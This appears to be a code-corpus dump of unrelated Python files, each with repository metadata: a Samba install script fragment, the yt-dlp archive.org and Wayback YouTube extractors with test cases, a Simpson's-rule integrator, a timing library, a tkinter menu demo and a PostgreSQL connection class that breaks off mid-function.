ops.copyto(ops.path_join(install_tmp_dir, "usr/local/samba/lib/ldb"), dst_lib_dir)
ops.copyto(ops.path_join(install_tmp_dir, "usr/local/samba/lib/nss_info"), dst_lib_dir)
ops.copyto(ops.path_join(install_tmp_dir, "usr/local/samba/lib/vfs"), dst_lib_dir)
ops.ln(dst_usr_local_dir, "/tmp/samba", "samba")
return True
def MAIN_INSTALL(args):
set_global(args)
iopc.installBin(args["pkg_name"], ops.path_join(dst_lib_dir, "."), "lib")
iopc.installBin(args["pkg_name"], ops.path_join(dst_bin_dir, "."), "usr/sbin")
iopc.installBin(args["pkg_name"], ops.path_join(dst_usr_local_dir, "."), "usr/local")
#iopc.installBin(args["pkg_name"], ops.path_join(tmp_include_dir, "."), dst_include_dir)
#iopc.installBin(args["pkg_name"], ops.path_join(dst_pkgconfig_dir, '.'), "pkgconfig")
return False
def MAIN_SDKENV(args):
set_global(args)
return False
def MAIN_CLEAN_BUILD(args):
set_global(args)
return False
def MAIN(args):
set_global(args)
| 2.140625 | 2 |
packages/pyre/tracking/Chain.py | lijun99/pyre | 3 | 11342 | <reponame>lijun99/pyre
# -*- coding: utf-8 -*-
#
# <NAME>. aïvázis
# orthologue
# (c) 1998-2019 all rights reserved
#
# declaration
class Chain:
"""
A locator that ties together two others in order to express that something in {next}
caused {this} to be recorded
"""
# meta methods
def __init__(self, this, next):
self.this = this
self.next = next
return
def __str__(self):
# if {next} is non-trivial, show the chain
if self.next: return "{0.this}, {0.next}".format(self)
# otherwise don't
return "{0.this}".format(self)
# implementation details
__slots__ = "this", "next"
# end of file
| 2.859375 | 3 |
tests/resources/accepted/res_0_minpyversion_3_0.py | matteogabburo/python-ast-utils | 3 | 11343 | import os
x = 7
print(x + 1)
| 1.914063 | 2 |
Mod 03/03 Prova.py | SauloCav/CN | 0 | 11344 | #! /usr/bin/env python3
# -*- coding: utf-8 -*-
import math
def f(x):
return math.exp(x)/x**3
def int(a,b):
h = (b-a)/104
x_par = a+h
x_impar = a+2*h
soma_par = 0
soma_impar = 0
for i in range(52):
soma_par += f(x_par)
x_par += 2*h
for i in range(51):
soma_impar += f(x_impar)
x_impar += 2*h
return (f(a)+f(b) + 4 * soma_par + 2*soma_impar) *h/3
print(int(1.9,9.7))
| 3.59375 | 4 |
almetro/al.py | arnour/almetro | 0 | 11345 | <gh_stars>0
from almetro.instance import growing
from almetro.metro import Metro
import timeit
class ExecutionSettings:
def __init__(self, trials=1, runs=1):
if not trials or trials < 1:
raise TypeError('#trials must be provided')
if not runs or runs < 1:
raise TypeError('#runs must be provided')
self.trials = trials
self.runs = runs
@staticmethod
def new():
return ExecutionSettings()
class InstanceSettings:
def __init__(self, instances=1, provider=growing()):
if not instances:
raise TypeError('#instances must be provided')
if not provider:
raise TypeError('provider must be provided')
self.instances = instances
self.provider = provider
@staticmethod
def new():
return InstanceSettings()
class Al:
def __init__(self, instance_settings=InstanceSettings.new(), execution_settings=ExecutionSettings.new()):
if not instance_settings:
raise TypeError('instance settings must be provided')
if not execution_settings:
raise TypeError('execution settings must be provided')
self.__instance_settings = instance_settings
self.__execution_settings = execution_settings
def with_instances(self, instances, provider):
return Al(instance_settings=InstanceSettings(instances, provider), execution_settings=self.__execution_settings)
def with_execution(self, trials, runs=1):
return Al(instance_settings=self.__instance_settings, execution_settings=ExecutionSettings(trials, runs))
def metro(self, algorithm, complexity):
metro = Metro.new(complexity)
for _ in range(self.__instance_settings.instances):
instance = self.__instance_settings.provider.new_instance()
def runner():
algorithm(**instance.value)
metro.register(instance, timeit.repeat(runner, number=self.__execution_settings.runs, repeat=self.__execution_settings.trials))
return metro
| 2.4375 | 2 |
yt_dlp/extractor/archiveorg.py | mrBliss/yt-dlp | 80 | 11346 | <filename>yt_dlp/extractor/archiveorg.py
# coding: utf-8
from __future__ import unicode_literals
import re
import json
from .common import InfoExtractor
from .youtube import YoutubeIE, YoutubeBaseInfoExtractor
from ..compat import (
compat_urllib_parse_unquote,
compat_urllib_parse_unquote_plus,
compat_HTTPError
)
from ..utils import (
bug_reports_message,
clean_html,
dict_get,
extract_attributes,
ExtractorError,
get_element_by_id,
HEADRequest,
int_or_none,
KNOWN_EXTENSIONS,
merge_dicts,
mimetype2ext,
orderedSet,
parse_duration,
parse_qs,
str_to_int,
str_or_none,
traverse_obj,
try_get,
unified_strdate,
unified_timestamp,
urlhandle_detect_ext,
url_or_none
)
class ArchiveOrgIE(InfoExtractor):
IE_NAME = 'archive.org'
IE_DESC = 'archive.org video and audio'
_VALID_URL = r'https?://(?:www\.)?archive\.org/(?:details|embed)/(?P<id>[^?#]+)(?:[?].*)?$'
_TESTS = [{
'url': 'http://archive.org/details/XD300-23_68HighlightsAResearchCntAugHumanIntellect',
'md5': '8af1d4cf447933ed3c7f4871162602db',
'info_dict': {
'id': 'XD300-23_68HighlightsAResearchCntAugHumanIntellect',
'ext': 'ogv',
'title': '1968 Demo - FJCC Conference Presentation Reel #1',
'description': 'md5:da45c349df039f1cc8075268eb1b5c25',
'release_date': '19681210',
'timestamp': 1268695290,
'upload_date': '20100315',
'creator': 'SRI International',
'uploader': '<EMAIL>',
},
}, {
'url': 'https://archive.org/details/Cops1922',
'md5': '0869000b4ce265e8ca62738b336b268a',
'info_dict': {
'id': 'Cops1922',
'ext': 'mp4',
'title': 'Buster Keaton\'s "Cops" (1922)',
'description': 'md5:43a603fd6c5b4b90d12a96b921212b9c',
'uploader': '<EMAIL>',
'timestamp': 1387699629,
'upload_date': "20131222",
},
}, {
'url': 'http://archive.org/embed/XD300-23_68HighlightsAResearchCntAugHumanIntellect',
'only_matching': True,
}, {
'url': 'https://archive.org/details/Election_Ads',
'md5': '284180e857160cf866358700bab668a3',
'info_dict': {
'id': 'Election_Ads/Commercial-JFK1960ElectionAdCampaignJingle.mpg',
'title': 'Commercial-JFK1960ElectionAdCampaignJingle.mpg',
'ext': 'mp4',
},
}, {
'url': 'https://archive.org/details/Election_Ads/Commercial-Nixon1960ElectionAdToughonDefense.mpg',
'md5': '7915213ef02559b5501fe630e1a53f59',
'info_dict': {
'id': 'Election_Ads/Commercial-Nixon1960ElectionAdToughonDefense.mpg',
'title': 'Commercial-Nixon1960ElectionAdToughonDefense.mpg',
'ext': 'mp4',
'timestamp': 1205588045,
'uploader': '<EMAIL>',
'description': '1960 Presidential Campaign Election Commercials <NAME>, <NAME>',
'upload_date': '20080315',
},
}, {
'url': 'https://archive.org/details/gd1977-05-08.shure57.stevenson.29303.flac16',
'md5': '7d07ffb42aba6537c28e053efa4b54c9',
'info_dict': {
'id': 'gd1977-05-08.shure57.stevenson.29303.flac16/gd1977-05-08d01t01.flac',
'title': 'Turning',
'ext': 'flac',
},
}, {
'url': 'https://archive.org/details/gd1977-05-08.shure57.stevenson.29303.flac16/gd1977-05-08d01t07.flac',
'md5': 'a07cd8c6ab4ee1560f8a0021717130f3',
'info_dict': {
'id': 'gd1977-05-08.shure57.stevenson.29303.flac16/gd1977-05-08d01t07.flac',
'title': 'Deal',
'ext': 'flac',
'timestamp': 1205895624,
'uploader': '<EMAIL>',
'description': 'md5:6a31f1996db0aa0fc9da6d6e708a1bb0',
'upload_date': '20080319',
'location': 'Barton Hall - Cornell University',
},
}, {
'url': 'https://archive.org/details/lp_the-music-of-russia_various-artists-a-askaryan-alexander-melik',
'md5': '7cb019baa9b332e82ea7c10403acd180',
'info_dict': {
'id': 'lp_the-music-of-russia_various-artists-a-askaryan-alexander-melik/disc1/01.01. Bells Of Rostov.mp3',
'title': 'Bells Of Rostov',
'ext': 'mp3',
},
}, {
'url': 'https://archive.org/details/lp_the-music-of-russia_various-artists-a-askaryan-alexander-melik/disc1/02.02.+Song+And+Chorus+In+The+Polovetsian+Camp+From+%22Prince+Igor%22+(Act+2%2C+Scene+1).mp3',
'md5': '1d0aabe03edca83ca58d9ed3b493a3c3',
'info_dict': {
'id': 'lp_the-music-of-russia_various-artists-a-askaryan-alexander-melik/disc1/02.02. Song And Chorus In The Polovetsian Camp From "Prince Igor" (Act 2, Scene 1).mp3',
'title': 'Song And Chorus In The Polovetsian Camp From "Prince Igor" (Act 2, Scene 1)',
'ext': 'mp3',
'timestamp': 1569662587,
'uploader': '<EMAIL>',
'description': 'md5:012b2d668ae753be36896f343d12a236',
'upload_date': '20190928',
},
}]
@staticmethod
def _playlist_data(webpage):
element = re.findall(r'''(?xs)
<input
(?:\s+[a-zA-Z0-9:._-]+(?:=[a-zA-Z0-9:._-]*|="[^"]*"|='[^']*'|))*?
\s+class=['"]?js-play8-playlist['"]?
(?:\s+[a-zA-Z0-9:._-]+(?:=[a-zA-Z0-9:._-]*|="[^"]*"|='[^']*'|))*?
\s*/>
''', webpage)[0]
return json.loads(extract_attributes(element)['value'])
def _real_extract(self, url):
video_id = compat_urllib_parse_unquote_plus(self._match_id(url))
identifier, entry_id = (video_id.split('/', 1) + [None])[:2]
# Archive.org metadata API doesn't clearly demarcate playlist entries
# or subtitle tracks, so we get them from the embeddable player.
embed_page = self._download_webpage(
'https://archive.org/embed/' + identifier, identifier)
playlist = self._playlist_data(embed_page)
entries = {}
for p in playlist:
# If the user specified a playlist entry in the URL, ignore the
# rest of the playlist.
if entry_id and p['orig'] != entry_id:
continue
entries[p['orig']] = {
'formats': [],
'thumbnails': [],
'artist': p.get('artist'),
'track': p.get('title'),
'subtitles': {}}
for track in p.get('tracks', []):
if track['kind'] != 'subtitles':
continue
entries[p['orig']][track['label']] = {
'url': 'https://archive.org/' + track['file'].lstrip('/')}
metadata = self._download_json(
'http://archive.org/metadata/' + identifier, identifier)
m = metadata['metadata']
identifier = m['identifier']
info = {
'id': identifier,
'title': m['title'],
'description': clean_html(m.get('description')),
'uploader': dict_get(m, ['uploader', 'adder']),
'creator': m.get('creator'),
'license': m.get('licenseurl'),
'release_date': unified_strdate(m.get('date')),
'timestamp': unified_timestamp(dict_get(m, ['publicdate', 'addeddate'])),
'webpage_url': 'https://archive.org/details/' + identifier,
'location': m.get('venue'),
'release_year': int_or_none(m.get('year'))}
for f in metadata['files']:
if f['name'] in entries:
entries[f['name']] = merge_dicts(entries[f['name']], {
'id': identifier + '/' + f['name'],
'title': f.get('title') or f['name'],
'display_id': f['name'],
'description': clean_html(f.get('description')),
'creator': f.get('creator'),
'duration': parse_duration(f.get('length')),
'track_number': int_or_none(f.get('track')),
'album': f.get('album'),
'discnumber': int_or_none(f.get('disc')),
'release_year': int_or_none(f.get('year'))})
entry = entries[f['name']]
elif f.get('original') in entries:
entry = entries[f['original']]
else:
continue
if f.get('format') == 'Thumbnail':
entry['thumbnails'].append({
'id': f['name'],
'url': 'https://archive.org/download/' + identifier + '/' + f['name'],
'width': int_or_none(f.get('width')),
'height': int_or_none(f.get('width')),
'filesize': int_or_none(f.get('size'))})
extension = (f['name'].rsplit('.', 1) + [None])[1]
if extension in KNOWN_EXTENSIONS:
entry['formats'].append({
'url': 'https://archive.org/download/' + identifier + '/' + f['name'],
'format': f.get('format'),
'width': int_or_none(f.get('width')),
'height': int_or_none(f.get('height')),
'filesize': int_or_none(f.get('size')),
'protocol': 'https'})
# Sort available formats by filesize
for entry in entries.values():
entry['formats'] = list(sorted(entry['formats'], key=lambda x: x.get('filesize', -1)))
if len(entries) == 1:
# If there's only one item, use it as the main info dict
only_video = entries[list(entries.keys())[0]]
if entry_id:
info = merge_dicts(only_video, info)
else:
info = merge_dicts(info, only_video)
else:
# Otherwise, we have a playlist.
info['_type'] = 'playlist'
info['entries'] = list(entries.values())
if metadata.get('reviews'):
info['comments'] = []
for review in metadata['reviews']:
info['comments'].append({
'id': review.get('review_id'),
'author': review.get('reviewer'),
'text': str_or_none(review.get('reviewtitle'), '') + '\n\n' + review.get('reviewbody'),
'timestamp': unified_timestamp(review.get('createdate')),
'parent': 'root'})
return info
class YoutubeWebArchiveIE(InfoExtractor):
IE_NAME = 'web.archive:youtube'
IE_DESC = 'web.archive.org saved youtube videos'
_VALID_URL = r"""(?x)^
(?:https?://)?web\.archive\.org/
(?:web/)?
(?:(?P<date>[0-9]{14})?[0-9A-Za-z_*]*/)? # /web and the version index is optional
(?:https?(?::|%3[Aa])//)?
(?:
(?:\w+\.)?youtube\.com(?::(?:80|443))?/watch(?:\.php)?(?:\?|%3[fF])(?:[^\#]+(?:&|%26))?v(?:=|%3[dD]) # Youtube URL
|(?:wayback-fakeurl\.archive\.org/yt/) # Or the internal fake url
)
(?P<id>[0-9A-Za-z_-]{11})(?:%26|\#|&|$)
"""
_TESTS = [
{
'url': 'https://web.archive.org/web/20150415002341/https://www.youtube.com/watch?v=aYAGB11YrSs',
'info_dict': {
'id': 'aYAGB11YrSs',
'ext': 'webm',
'title': 'Team Fortress 2 - Sandviches!',
'description': 'md5:4984c0f9a07f349fc5d8e82ab7af4eaf',
'upload_date': '20110926',
'uploader': 'Zeurel',
'channel_id': 'UCukCyHaD-bK3in_pKpfH9Eg',
'duration': 32,
'uploader_id': 'Zeurel',
'uploader_url': 'http://www.youtube.com/user/Zeurel'
}
}, {
# Internal link
'url': 'https://web.archive.org/web/2oe/http://wayback-fakeurl.archive.org/yt/97t7Xj_iBv0',
'info_dict': {
'id': '97t7Xj_iBv0',
'ext': 'mp4',
'title': 'Why Machines That Bend Are Better',
'description': 'md5:00404df2c632d16a674ff8df1ecfbb6c',
'upload_date': '20190312',
'uploader': 'Veritasium',
'channel_id': 'UCHnyfMqiRRG1u-2MsSQLbXA',
'duration': 771,
'uploader_id': '1veritasium',
'uploader_url': 'http://www.youtube.com/user/1veritasium'
}
}, {
# Video from 2012, webm format itag 45. Newest capture is deleted video, with an invalid description.
# Should use the date in the link. Title ends with '- Youtube'. Capture has description in eow-description
'url': 'https://web.archive.org/web/20120712231619/http://www.youtube.com/watch?v=AkhihxRKcrs&gl=US&hl=en',
'info_dict': {
'id': 'AkhihxRKcrs',
'ext': 'webm',
'title': 'Limited Run: Mondo\'s Modern Classic 1 of 3 (SDCC 2012)',
'upload_date': '20120712',
'duration': 398,
'description': 'md5:ff4de6a7980cb65d951c2f6966a4f2f3',
'uploader_id': 'machinima',
'uploader_url': 'http://www.youtube.com/user/machinima'
}
}, {
# FLV video. Video file URL does not provide itag information
'url': 'https://web.archive.org/web/20081211103536/http://www.youtube.com/watch?v=jNQXAC9IVRw',
'info_dict': {
'id': 'jNQXAC9IVRw',
'ext': 'flv',
'title': 'Me at the zoo',
'upload_date': '20050423',
'channel_id': 'UC4QobU6STFB0P71PMvOGN5A',
'duration': 19,
'description': 'md5:10436b12e07ac43ff8df65287a56efb4',
'uploader_id': 'jawed',
'uploader_url': 'http://www.youtube.com/user/jawed'
}
}, {
'url': 'https://web.archive.org/web/20110712231407/http://www.youtube.com/watch?v=lTx3G6h2xyA',
'info_dict': {
'id': 'lTx3G6h2xyA',
'ext': 'flv',
'title': 'Madeon - Pop Culture (live mashup)',
'upload_date': '20110711',
'uploader': 'Madeon',
'channel_id': 'UCqMDNf3Pn5L7pcNkuSEeO3w',
'duration': 204,
'description': 'md5:f7535343b6eda34a314eff8b85444680',
'uploader_id': 'itsmadeon',
'uploader_url': 'http://www.youtube.com/user/itsmadeon'
}
}, {
# First capture is of dead video, second is the oldest from CDX response.
'url': 'https://web.archive.org/https://www.youtube.com/watch?v=1JYutPM8O6E',
'info_dict': {
'id': '1JYutPM8O6E',
'ext': 'mp4',
'title': 'Fake Teen Doctor Strikes AGAIN! - Weekly Weird News',
'upload_date': '20160218',
'channel_id': 'UCdIaNUarhzLSXGoItz7BHVA',
'duration': 1236,
'description': 'md5:21032bae736421e89c2edf36d1936947',
'uploader_id': 'MachinimaETC',
'uploader_url': 'http://www.youtube.com/user/MachinimaETC'
}
}, {
# First capture of dead video, capture date in link links to dead capture.
'url': 'https://web.archive.org/web/20180803221945/https://www.youtube.com/watch?v=6FPhZJGvf4E',
'info_dict': {
'id': '6FPhZJGvf4E',
'ext': 'mp4',
'title': 'WTF: Video Games Still Launch BROKEN?! - T.U.G.S.',
'upload_date': '20160219',
'channel_id': 'UCdIaNUarhzLSXGoItz7BHVA',
'duration': 798,
'description': 'md5:a1dbf12d9a3bd7cb4c5e33b27d77ffe7',
'uploader_id': 'MachinimaETC',
'uploader_url': 'http://www.youtube.com/user/MachinimaETC'
},
'expected_warnings': [
r'unable to download capture webpage \(it may not be archived\)'
]
}, { # Very old YouTube page, has - YouTube in title.
'url': 'http://web.archive.org/web/20070302011044/http://youtube.com/watch?v=-06-KB9XTzg',
'info_dict': {
'id': '-06-KB9XTzg',
'ext': 'flv',
'title': 'New Coin Hack!! 100% Safe!!'
}
}, {
'url': 'web.archive.org/https://www.youtube.com/watch?v=dWW7qP423y8',
'info_dict': {
'id': 'dWW7qP423y8',
'ext': 'mp4',
'title': 'It\'s Bootleg AirPods Time.',
'upload_date': '20211021',
'channel_id': 'UC7Jwj9fkrf1adN4fMmTkpug',
'channel_url': 'http://www.youtube.com/channel/UC7Jwj9fkrf1adN4fMmTkpug',
'duration': 810,
'description': 'md5:7b567f898d8237b256f36c1a07d6d7bc',
'uploader': 'DankPods',
'uploader_id': 'UC7Jwj9fkrf1adN4fMmTkpug',
'uploader_url': 'http://www.youtube.com/channel/UC7Jwj9fkrf1adN4fMmTkpug'
}
}, {
# player response contains '};' See: https://github.com/ytdl-org/youtube-dl/issues/27093
'url': 'https://web.archive.org/web/20200827003909if_/http://www.youtube.com/watch?v=6Dh-RL__uN4',
'info_dict': {
'id': '6Dh-RL__uN4',
'ext': 'mp4',
'title': 'bitch lasagna',
'upload_date': '20181005',
'channel_id': 'UC-lHJZR3Gqxm24_Vd_AJ5Yw',
'channel_url': 'http://www.youtube.com/channel/UC-lHJZR3Gqxm24_Vd_AJ5Yw',
'duration': 135,
'description': 'md5:2dbe4051feeff2dab5f41f82bb6d11d0',
'uploader': 'PewDiePie',
'uploader_id': 'PewDiePie',
'uploader_url': 'http://www.youtube.com/user/PewDiePie'
}
}, {
'url': 'https://web.archive.org/web/http://www.youtube.com/watch?v=kH-G_aIBlFw',
'only_matching': True
}, {
'url': 'https://web.archive.org/web/20050214000000_if/http://www.youtube.com/watch?v=0altSZ96U4M',
'only_matching': True
}, {
# Video not archived, only capture is unavailable video page
'url': 'https://web.archive.org/web/20210530071008/https://www.youtube.com/watch?v=lHJTf93HL1s&spfreload=10',
'only_matching': True
}, { # Encoded url
'url': 'https://web.archive.org/web/20120712231619/http%3A//www.youtube.com/watch%3Fgl%3DUS%26v%3DAkhihxRKcrs%26hl%3Den',
'only_matching': True
}, {
'url': 'https://web.archive.org/web/20120712231619/http%3A//www.youtube.com/watch%3Fv%3DAkhihxRKcrs%26gl%3DUS%26hl%3Den',
'only_matching': True
}, {
'url': 'https://web.archive.org/web/20060527081937/http://www.youtube.com:80/watch.php?v=ELTFsLT73fA&search=soccer',
'only_matching': True
}, {
'url': 'https://web.archive.org/http://www.youtube.com:80/watch?v=-05VVye-ffg',
'only_matching': True
}
]
_YT_INITIAL_DATA_RE = r'(?:(?:(?:window\s*\[\s*["\']ytInitialData["\']\s*\]|ytInitialData)\s*=\s*({.+?})\s*;)|%s)' % YoutubeBaseInfoExtractor._YT_INITIAL_DATA_RE
_YT_INITIAL_PLAYER_RESPONSE_RE = r'(?:(?:(?:window\s*\[\s*["\']ytInitialPlayerResponse["\']\s*\]|ytInitialPlayerResponse)\s*=[(\s]*({.+?})[)\s]*;)|%s)' % YoutubeBaseInfoExtractor._YT_INITIAL_PLAYER_RESPONSE_RE
_YT_INITIAL_BOUNDARY_RE = r'(?:(?:var\s+meta|</script|\n)|%s)' % YoutubeBaseInfoExtractor._YT_INITIAL_BOUNDARY_RE
_YT_DEFAULT_THUMB_SERVERS = ['i.ytimg.com'] # thumbnails most likely archived on these servers
_YT_ALL_THUMB_SERVERS = orderedSet(
_YT_DEFAULT_THUMB_SERVERS + ['img.youtube.com', *[f'{c}{n or ""}.ytimg.com' for c in ('i', 's') for n in (*range(0, 5), 9)]])
_WAYBACK_BASE_URL = 'https://web.archive.org/web/%sif_/'
_OLDEST_CAPTURE_DATE = 20050214000000
_NEWEST_CAPTURE_DATE = 20500101000000
def _call_cdx_api(self, item_id, url, filters: list = None, collapse: list = None, query: dict = None, note='Downloading CDX API JSON'):
# CDX docs: https://github.com/internetarchive/wayback/blob/master/wayback-cdx-server/README.md
query = {
'url': url,
'output': 'json',
'fl': 'original,mimetype,length,timestamp',
'limit': 500,
'filter': ['statuscode:200'] + (filters or []),
'collapse': collapse or [],
**(query or {})
}
res = self._download_json('https://web.archive.org/cdx/search/cdx', item_id, note, query=query)
if isinstance(res, list) and len(res) >= 2:
# format response to make it easier to use
return list(dict(zip(res[0], v)) for v in res[1:])
elif not isinstance(res, list) or len(res) != 0:
self.report_warning('Error while parsing CDX API response' + bug_reports_message())
def _extract_yt_initial_variable(self, webpage, regex, video_id, name):
return self._parse_json(self._search_regex(
(r'%s\s*%s' % (regex, self._YT_INITIAL_BOUNDARY_RE),
regex), webpage, name, default='{}'), video_id, fatal=False)
def _extract_webpage_title(self, webpage):
page_title = self._html_search_regex(
r'<title>([^<]*)</title>', webpage, 'title', default='')
# YouTube video pages appear to always have either 'YouTube -' as prefix or '- YouTube' as suffix.
return self._html_search_regex(
r'(?:YouTube\s*-\s*(.*)$)|(?:(.*)\s*-\s*YouTube$)',
page_title, 'title', default='')
def _extract_metadata(self, video_id, webpage):
search_meta = ((lambda x: self._html_search_meta(x, webpage, default=None)) if webpage else (lambda x: None))
player_response = self._extract_yt_initial_variable(
webpage, self._YT_INITIAL_PLAYER_RESPONSE_RE, video_id, 'initial player response') or {}
initial_data = self._extract_yt_initial_variable(
webpage, self._YT_INITIAL_DATA_RE, video_id, 'initial player response') or {}
initial_data_video = traverse_obj(
initial_data, ('contents', 'twoColumnWatchNextResults', 'results', 'results', 'contents', ..., 'videoPrimaryInfoRenderer'),
expected_type=dict, get_all=False, default={})
video_details = traverse_obj(
player_response, 'videoDetails', expected_type=dict, get_all=False, default={})
microformats = traverse_obj(
player_response, ('microformat', 'playerMicroformatRenderer'), expected_type=dict, get_all=False, default={})
video_title = (
video_details.get('title')
or YoutubeBaseInfoExtractor._get_text(microformats, 'title')
or YoutubeBaseInfoExtractor._get_text(initial_data_video, 'title')
or self._extract_webpage_title(webpage)
or search_meta(['og:title', 'twitter:title', 'title']))
channel_id = str_or_none(
video_details.get('channelId')
or microformats.get('externalChannelId')
or search_meta('channelId')
or self._search_regex(
r'data-channel-external-id=(["\'])(?P<id>(?:(?!\1).)+)\1', # @b45a9e6
webpage, 'channel id', default=None, group='id'))
channel_url = f'http://www.youtube.com/channel/{channel_id}' if channel_id else None
duration = int_or_none(
video_details.get('lengthSeconds')
or microformats.get('lengthSeconds')
or parse_duration(search_meta('duration')))
description = (
video_details.get('shortDescription')
or YoutubeBaseInfoExtractor._get_text(microformats, 'description')
or clean_html(get_element_by_id('eow-description', webpage)) # @9e6dd23
or search_meta(['description', 'og:description', 'twitter:description']))
uploader = video_details.get('author')
# Uploader ID and URL
uploader_mobj = re.search(
r'<link itemprop="url" href="(?P<uploader_url>https?://www\.youtube\.com/(?:user|channel)/(?P<uploader_id>[^"]+))">', # @fd05024
webpage)
if uploader_mobj is not None:
uploader_id, uploader_url = uploader_mobj.group('uploader_id'), uploader_mobj.group('uploader_url')
else:
# @a6211d2
uploader_url = url_or_none(microformats.get('ownerProfileUrl'))
uploader_id = self._search_regex(
r'(?:user|channel)/([^/]+)', uploader_url or '', 'uploader id', default=None)
upload_date = unified_strdate(
dict_get(microformats, ('uploadDate', 'publishDate'))
or search_meta(['uploadDate', 'datePublished'])
or self._search_regex(
[r'(?s)id="eow-date.*?>(.*?)</span>',
r'(?:id="watch-uploader-info".*?>.*?|["\']simpleText["\']\s*:\s*["\'])(?:Published|Uploaded|Streamed live|Started) on (.+?)[<"\']'], # @7998520
webpage, 'upload date', default=None))
return {
'title': video_title,
'description': description,
'upload_date': upload_date,
'uploader': uploader,
'channel_id': channel_id,
'channel_url': channel_url,
'duration': duration,
'uploader_url': uploader_url,
'uploader_id': uploader_id,
}
def _extract_thumbnails(self, video_id):
try_all = 'thumbnails' in self._configuration_arg('check_all')
thumbnail_base_urls = ['http://{server}/vi{webp}/{video_id}'.format(
webp='_webp' if ext == 'webp' else '', video_id=video_id, server=server)
for server in (self._YT_ALL_THUMB_SERVERS if try_all else self._YT_DEFAULT_THUMB_SERVERS) for ext in (('jpg', 'webp') if try_all else ('jpg',))]
thumbnails = []
for url in thumbnail_base_urls:
response = self._call_cdx_api(
video_id, url, filters=['mimetype:image/(?:webp|jpeg)'],
collapse=['urlkey'], query={'matchType': 'prefix'})
if not response:
continue
thumbnails.extend(
{
'url': (self._WAYBACK_BASE_URL % (int_or_none(thumbnail_dict.get('timestamp')) or self._OLDEST_CAPTURE_DATE)) + thumbnail_dict.get('original'),
'filesize': int_or_none(thumbnail_dict.get('length')),
'preference': int_or_none(thumbnail_dict.get('length'))
} for thumbnail_dict in response)
if not try_all:
break
self._remove_duplicate_formats(thumbnails)
return thumbnails
def _get_capture_dates(self, video_id, url_date):
capture_dates = []
# Note: CDX API will not find watch pages with extra params in the url.
response = self._call_cdx_api(
video_id, f'https://www.youtube.com/watch?v={video_id}',
filters=['mimetype:text/html'], collapse=['timestamp:6', 'digest'], query={'matchType': 'prefix'}) or []
all_captures = sorted([int_or_none(r['timestamp']) for r in response if int_or_none(r['timestamp']) is not None])
# Prefer the new polymer UI captures as we support extracting more metadata from them
# WBM captures seem to all switch to this layout ~July 2020
modern_captures = list(filter(lambda x: x >= 20200701000000, all_captures))
if modern_captures:
capture_dates.append(modern_captures[0])
capture_dates.append(url_date)
if all_captures:
capture_dates.append(all_captures[0])
if 'captures' in self._configuration_arg('check_all'):
capture_dates.extend(modern_captures + all_captures)
# Fallbacks if any of the above fail
capture_dates.extend([self._OLDEST_CAPTURE_DATE, self._NEWEST_CAPTURE_DATE])
return orderedSet(capture_dates)
def _real_extract(self, url):
url_date, video_id = self._match_valid_url(url).groups()
urlh = None
try:
urlh = self._request_webpage(
HEADRequest('https://web.archive.org/web/2oe_/http://wayback-fakeurl.archive.org/yt/%s' % video_id),
video_id, note='Fetching archived video file url', expected_status=True)
except ExtractorError as e:
# HTTP Error 404 is expected if the video is not saved.
if isinstance(e.cause, compat_HTTPError) and e.cause.code == 404:
self.raise_no_formats(
'The requested video is not archived, indexed, or there is an issue with web.archive.org',
expected=True)
else:
raise
capture_dates = self._get_capture_dates(video_id, int_or_none(url_date))
self.write_debug('Captures to try: ' + ', '.join(str(i) for i in capture_dates if i is not None))
info = {'id': video_id}
for capture in capture_dates:
if not capture:
continue
webpage = self._download_webpage(
(self._WAYBACK_BASE_URL + 'http://www.youtube.com/watch?v=%s') % (capture, video_id),
video_id=video_id, fatal=False, errnote='unable to download capture webpage (it may not be archived)',
note='Downloading capture webpage')
current_info = self._extract_metadata(video_id, webpage or '')
# Try avoid getting deleted video metadata
if current_info.get('title'):
info = merge_dicts(info, current_info)
if 'captures' not in self._configuration_arg('check_all'):
break
info['thumbnails'] = self._extract_thumbnails(video_id)
if urlh:
url = compat_urllib_parse_unquote(urlh.url)
video_file_url_qs = parse_qs(url)
# Attempt to recover any ext & format info from playback url & response headers
format = {'url': url, 'filesize': int_or_none(urlh.headers.get('x-archive-orig-content-length'))}
itag = try_get(video_file_url_qs, lambda x: x['itag'][0])
if itag and itag in YoutubeIE._formats:
format.update(YoutubeIE._formats[itag])
format.update({'format_id': itag})
else:
mime = try_get(video_file_url_qs, lambda x: x['mime'][0])
ext = (mimetype2ext(mime)
or urlhandle_detect_ext(urlh)
or mimetype2ext(urlh.headers.get('x-archive-guessed-content-type')))
format.update({'ext': ext})
info['formats'] = [format]
if not info.get('duration'):
info['duration'] = str_to_int(try_get(video_file_url_qs, lambda x: x['dur'][0]))
if not info.get('title'):
info['title'] = video_id
return info
| 2.046875 | 2 |
Interfas Grafica XI (GUI)/InterfasGraficaXI.py | BrianMarquez3/Python-Course | 20 | 11347 | <filename>Interfas Grafica XI (GUI)/InterfasGraficaXI.py
# Interfas Grafica XI
# Menu
from tkinter import *
root=Tk()
barraMenu=Menu(root)
root.config(menu=barraMenu, width=600, height=400)
archivoMenu=Menu(barraMenu, tearoff=0)
archivoMenu.add_command(label="Nuevo")
archivoMenu.add_command(label="Guardar")
archivoMenu.add_command(label="Guardar Como")
archivoMenu.add_separator()
archivoMenu.add_command(label="Cerrar")
archivoMenu.add_command(label="Salir")
archivoEdicion=Menu(barraMenu, tearoff=0)
archivoHerramientas=Menu(barraMenu)
archivoEdicion.add_command(label="Copiar")
archivoEdicion.add_command(label="Cortar")
archivoEdicion.add_command(label="Pegar")
archivoAyuda=Menu(barraMenu, tearoff=0)
barraMenu.add_cascade(label="Archivo", menu=archivoMenu)
barraMenu.add_cascade(label="Edicion", menu=archivoEdicion)
barraMenu.add_cascade(label="Herramienta", menu=archivoHerramientas)
barraMenu.add_cascade(label="Ayuda", menu=archivoAyuda)
archivoAyuda.add_command(label="Licencia")
archivoAyuda.add_command(label="Acerca de...")
root.mainloop() | 2.5625 | 3 |
virtual/lib/python3.6/site-packages/macaroonbakery/tests/__init__.py | marknesh/pitches | 0 | 11348 | # Copyright 2017 Canonical Ltd.
# Licensed under the LGPLv3, see LICENCE file for details.
| 0.703125 | 1 |
08/postgresql_demo.py | catcherwong-archive/2019 | 27 | 11349 | <reponame>catcherwong-archive/2019<gh_stars>10-100
# -*- coding: UTF-8 -*-
import psycopg2 #postgresql
import time
import datetime
class PgDemo:
def __init__(self, host, port, db, user, pwd):
self.host = host
self.port = port
self.db = db
self.user = user
self.pwd = <PASSWORD>
def getConnection(self):
conn = None
try:
conn = psycopg2.connect(
host=self.host,
port=self.port,
database=self.db,
user=self.user,
password=self.pwd,
)
